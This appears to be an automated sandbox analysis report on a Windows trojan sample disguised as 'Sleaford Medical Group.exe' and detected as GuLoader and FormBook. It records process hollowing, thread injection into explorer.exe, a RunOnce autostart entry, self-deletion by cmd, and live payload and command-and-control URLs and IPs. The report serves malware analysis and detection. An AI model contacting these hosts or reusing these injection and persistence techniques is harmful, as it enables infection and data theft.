      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03808EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03898ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03881608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_0388AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_037EC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_038905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_037E7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_037F4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe | Code function: 28_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 104.21.89.82 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\help.exe | Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Section unmapped: C:\Windows\SysWOW64\help.exe base address: E60000
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe | Process created: C:\Users\user\Desktop\Sleaford Medical Group.exe 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
Source: explorer.exe, 00000018.00000000.501184741.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
Source: explorer.exe, 00000018.00000002.734973768.0000000001980000.00000002.00000001.sdmp, oversad.exe, 0000001A.00000002.732448844.0000000000C40000.00000002.00000001.sdmp, help.exe, 0000001C.00000002.737092327.0000000004C30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000018.00000000.524058813.000000000871F000.00000004.00000001.sdmp, oversad.exe, 0000001A.00000002.732448844.0000000000C40000.00000002.00000001.sdmp, help.exe, 0000001C.00000002.737092327.0000000004C30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000018.00000002.734973768.0000000001980000.00000002.00000001.sdmp, oversad.exe, 0000001A.00000002.732448844.0000000000C40000.00000002.00000001.sdmp, help.exe, 0000001C.00000002.737092327.0000000004C30000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000018.00000002.734973768.0000000001980000.00000002.00000001.sdmp, oversad.exe, 0000001A.00000002.732448844.0000000000C40000.00000002.00000001.sdmp, help.exe, 0000001C.00000002.737092327.0000000004C30000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match | File source: Process Memory Space: help.exe PID: 6328, type: MEMORY
Source: Yara match | File source: Process Memory Space: Sleaford Medical Group.exe PID: 5356, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting11 | Registry Run Keys / Startup Folder11 | Process Injection512 | Rootkit1 | Credential API Hooking1 | Security Software Discovery721 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder11 | Virtualization/Sandbox Evasion22 | Input Capture1 | Virtualization/Sandbox Evasion22 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection512 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Archive Collected Data1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting11 | LSA Secrets | System Information Discovery32 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

Behavior Graph

Behavior Graph ID: 358420 | Sample: Sleaford Medical Group.exe | Start date: 25/02/2021 | Architecture: WINDOWS | Score: 100

Sample-level: domains www.waymakers.site, waymakers.site; signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected GuLoader; 9 other signatures

Process tree recovered from the graph:
- Sleaford Medical Group.exe (started)
  signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Tries to detect Any.run; Hides threads from debuggers
  - Sleaford Medical Group.exe (started)
    network: 01677937777.burrow.io 159.203.144.58, ports 443, 49734, DIGITALOCEAN-ASNUS, United States
    dropped: C:\Users\user\AppData\Local\...\oversad.exe (PE32); C:\Users\user\AppData\Local\...\oversad.vbs (ASCII)
    signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
    - explorer.exe (injected)
      network: www.landingberg.com 104.21.89.82, ports 49745, 80, CLOUDFLARENETUS, United States
      signatures: System process connects to network (likely due to code injection or exploit)
      - help.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        - cmd.exe (started)
          - conhost.exe (started)
      - wscript.exe (started)
        - oversad.exe (started)
          signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Sleaford Medical Group.exe | 48% | Virustotal |
Sleaford Medical Group.exe | 11% | ReversingLabs |
Sleaford Medical Group.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe | 11% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
22.3.Sleaford Medical Group.exe.8cfbb0.0.unpack | 100% | Avira | TR/Patched.Gen

Domains

Source | Detection | Scanner | Label
01677937777.burrow.io | 5% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://www.landingberg.com/twy/?pPX=elx0UibK | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
https://01677937777.burrow.io/XzsF | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.landingberg.com/twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h | 0% | Avira URL Cloud | safe
https://01677937777.burrow.io/spark/binwhyte_utZnZr121.binT | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://r3.i.lencr.org/0 | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin38 | 0% | Avira URL Cloud | safe
http://r3.o.lencr.org0 | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://01677937777.burrow.io/uzTF | 0% | Avira URL Cloud | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
01677937777.burrow.io | 159.203.144.58 | true | false | | unknown
www.landingberg.com | 104.21.89.82 | true | true | | unknown
waymakers.site | 184.168.131.241 | true | false | | unknown
www.waymakers.site | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.landingberg.com/twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.landingberg.com/twy/?pPX=elx0UibK | help.exe, 0000001C.00000002.736924910.00000000041BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://cps.letsencrypt.org0 | Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
https://01677937777.burrow.io/XzsF | Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
https://01677937777.burrow.io/spark/binwhyte_utZnZr121.binT | Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://r3.i.lencr.org/0 | Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin | Sleaford Medical Group.exe | false | Avira URL Cloud: safe | unknown
http://fontfabrik.com | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin38 | Sleaford Medical Group.exe, 00000016.00000002.565857663.0000000000858000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://r3.o.lencr.org0 | Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://01677937777.burrow.io/uzTF | Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://cps.root-x1.letsencrypt.org0 | Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
159.203.144.58 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
104.21.89.82 | unknown | United States | 13335 | CLOUDFLARENETUS | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 358420
Start date: 25.02.2021
Start time: 15:42:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 58s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Sleaford Medical Group.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/2@3/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 56% (good quality ratio 47.2%)
• Quality average: 68.5%
• Quality standard deviation: 35.1%
HCA Information:
• Successful, ratio: 63%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 51.104.139.180, 13.88.21.125, 168.61.161.212, 104.43.139.144, 23.211.6.115, 52.255.188.83, 184.30.24.56, 8.253.207.120, 67.27.233.254, 67.27.159.126, 67.26.73.254, 8.248.149.254, 40.88.32.150, 92.122.213.247, 92.122.213.194, 20.54.26.129, 52.155.217.156
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                Time | Type | Description
                                15:45:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6 C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs
                                15:45:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6 C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs

                                Joe Sandbox View / Context

                                IPs

                                Match | Associated Sample Name / URL | Detection | Context
                                159.203.144.58 | https://ob4lyn.burrow.io/septslip121/?8=generalserve8ip11-8666yu78788887898178808&rav=kwells@afex.com | malicious |

                                  Domains

                                  No context

                                  ASN

                                  Match | Associated Sample Name / URL | Detection | Context
                                  CLOUDFLARENETUS | CN-Invoice-XXXXX9808-19011143287989.exe | malicious | 172.67.172.17
                                  CLOUDFLARENETUS | dwg.exe | malicious | 104.21.56.93
                                  CLOUDFLARENETUS | Purchase Order.exe | malicious | 104.21.19.200
                                  CLOUDFLARENETUS | DHL Shipment Notification 49833912.pdf.exe | malicious | 104.21.19.200
                                  CLOUDFLARENETUS | UAE CONTRACT SUPPLY.exe | malicious | 104.21.32.11
                                  CLOUDFLARENETUS | RFQ - REF 208056-pdf.exe | malicious | 172.67.172.17
                                  CLOUDFLARENETUS | CN-Invoice-XXXXX9808-19011143287994.exe | malicious | 172.67.172.17
                                  CLOUDFLARENETUS | twistercrypted.exe | malicious | 104.18.28.12
                                  CLOUDFLARENETUS | C1 PureQuest PO S1026710.xlsm | malicious | 104.16.19.94
                                  CLOUDFLARENETUS | C1 PureQuest PO S1026710.xlsm | malicious | 104.16.18.94
                                  CLOUDFLARENETUS | C1 PureQuest PO S1026710.xlsm | malicious | 104.17.234.204
                                  CLOUDFLARENETUS | Returned Message Body.exe | malicious | 172.67.188.154
                                  CLOUDFLARENETUS | W175EHpHv3.exe | malicious | 172.67.194.108
                                  CLOUDFLARENETUS | Bankdaten #f6356.pdf.exe | malicious | 172.67.188.154
                                  CLOUDFLARENETUS | W175EHpHv3.exe | malicious | 172.67.194.108
                                  CLOUDFLARENETUS | PO#2102003.exe | malicious | 172.67.188.154
                                  CLOUDFLARENETUS | Qvc Order .exe | malicious | 172.67.188.154
                                  CLOUDFLARENETUS | company inquiry.exe | malicious | 172.67.188.154
                                  CLOUDFLARENETUS | Neue Bestellung_WJO-001, pdf.exe | malicious | 104.21.19.200
                                  CLOUDFLARENETUS | Order NX-LI-15-0001.exe | malicious | 104.21.19.200
                                  DIGITALOCEAN-ASNUS | FB_1401_4_5,pdf.exe | malicious | 192.241.224.26
                                  DIGITALOCEAN-ASNUS | document-9725971.xls | malicious | 206.189.10.247
                                  DIGITALOCEAN-ASNUS | sOoaouUC1z.dll | malicious | 198.211.118.187
                                  DIGITALOCEAN-ASNUS | SecuriteInfo.com.Heur.12472.xls | malicious | 128.199.91.194
                                  DIGITALOCEAN-ASNUS | SecuriteInfo.com.Heur.12472.xls | malicious | 128.199.91.194
                                  DIGITALOCEAN-ASNUS | dkWZ6hSN9M.dll | malicious | 206.189.10.247
                                  DIGITALOCEAN-ASNUS | document-197066197.xls | malicious | 206.189.10.247
                                  DIGITALOCEAN-ASNUS | 530000.exe | malicious | 198.199.100.10
                                  DIGITALOCEAN-ASNUS | fecRZG3xtP.exe | malicious | 138.197.53.157
                                  DIGITALOCEAN-ASNUS | MV9tCJw8Xr.exe | malicious | 139.59.61.215
                                  DIGITALOCEAN-ASNUS | Complaint_Letter_1186814227-02192021.xls | malicious | 159.89.174.35
                                  DIGITALOCEAN-ASNUS | Complaint_Letter_1186814227-02192021.xls | malicious | 159.89.174.35
                                  DIGITALOCEAN-ASNUS | Quotation Reques.exe | malicious | 138.197.103.178
                                  DIGITALOCEAN-ASNUS | NewOrder.xlsm | malicious | 167.99.202.53
                                  DIGITALOCEAN-ASNUS | rieuro.dll | malicious | 206.189.10.247
                                  DIGITALOCEAN-ASNUS | document-1915351743.xls | malicious | 206.189.10.247
                                  DIGITALOCEAN-ASNUS | DHL_Shipment_Notification#5436637389_22_FEB.exe | malicious | 165.22.240.4
                                  DIGITALOCEAN-ASNUS | 124992436.docx | malicious | 68.183.127.92
                                  DIGITALOCEAN-ASNUS | 124992436.docx | malicious | 68.183.127.92

                                  JA3 Fingerprints

                                  Match | Associated Sample Name / URL | Detection | Context
                                  37f463bf4616ecd445d4a1937da06e19 | UAE CONTRACT SUPPLY.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | CustomerStatement.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Payment.html | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | EmployeeAnnualReport.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Customer Statement.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Remittance advice.htm | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Customer Statement.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Order-10236587458.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | RFQ_110199282773666355627277288.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | EMG 3.0.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | QUOTATION.xlsx | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | VM_629904-26374.htm | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | cm0Ubgm8Eu.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | caraganas.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Notification 466022.xlsm | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Fax #136.xlsm | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Purchase Order22420.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | ceFlxYfe4F.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Fatura.exe | malicious | 159.203.144.58
                                  37f463bf4616ecd445d4a1937da06e19 | Reports #176.xlsm | malicious | 159.203.144.58

                                  Dropped Files

                                  No context

                                  Created / dropped Files

